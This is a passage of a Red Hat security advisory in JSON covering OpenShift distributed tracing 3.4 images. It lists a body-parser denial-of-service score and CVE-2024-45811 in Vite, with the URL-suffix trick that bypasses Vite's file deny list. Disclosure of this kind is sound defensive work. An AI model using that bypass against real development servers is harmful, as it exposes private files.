3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "body-parser: Denial of Service Vulnerability in body-parser" }, { "cve": "CVE-2024-45811", "cwe": { "id": "CWE-284", "name": "Improper Access Control" }, "discovery_date": "2024-09-17T20:00:49.944925+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2312930" } ], "notes": [ { "category": "description", "text": "A flaw was found in ViteJS. `@fs` denies access to files outside of Vite serving allow list. Adding `?import\u0026raw` to the URL bypasses this limitation and returns the file content if it exists, which can allow an attacker to access arbitrary files via the browser.", "title": "Vulnerability description" }, { "category": "summary", "text": "vite: server.fs.deny is bypassed when using `?import\u0026raw`", "title": "Vulnerability summary" }, { "category": "other", "text": "This vulnerability is classified as moderate rather than high severity because it requires specific conditions for exploitation. The attacker must have access to the Vite server, which typically runs in a local development environment rather than in production. Additionally, the bypass allows file access only if the file path is already known or predictable, limiting the attacker\u0027s ability to arbitrarily explore the file system. While it exposes file content outside the Vite serving allow list, the scope of access is constrained, and the impact can be mitigated by proper server configurations and deployment practices.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-45811" }, { "category": "external", "summary": "RHBZ#2312930", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312930" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45811", "url": "https://www.cve.org/CVERecord?id=CVE-2024-45811" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45811", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45811" }, { "category": "external", "summary": "https://github.com/vitejs/vite", "url": "https://github.com/vitejs/vite" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249", "url": "https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34", "url": "https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd", "url": "https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6", "url": "https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6" }, { "category": "external", "summary": "https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7", "url": "https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7" }, { "category": "external", "summary": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx", "url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx" } ], "release_date": "2024-09-17T18:44:12+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 